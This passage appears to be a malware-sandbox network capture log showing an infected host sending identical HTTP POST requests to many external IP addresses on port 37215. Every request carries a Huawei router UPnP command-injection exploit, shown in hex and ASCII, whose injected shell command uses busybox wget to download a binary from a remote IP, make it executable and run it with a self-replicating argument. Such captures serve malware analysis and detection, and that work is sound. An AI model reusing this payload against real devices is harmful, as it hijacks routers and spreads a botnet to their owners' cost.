                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1623192.168.2.2356784135.172.114.19837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.500000954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1624192.168.2.2340752157.209.111.17637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.500080109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1625192.168.2.2358022157.96.125.23537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.501136065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1626192.168.2.233876041.245.178.21937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.501136065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1627192.168.2.2358700157.148.236.20237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.501250982 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1628192.168.2.2346018125.216.162.9637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.501250982 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1629192.168.2.2354476147.165.175.12337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.501363039 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1630192.168.2.2346576209.112.199.23237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.501422882 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1631192.168.2.2346760157.63.27.2237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.507822037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1632192.168.2.2345494159.226.70.23437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.507827044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 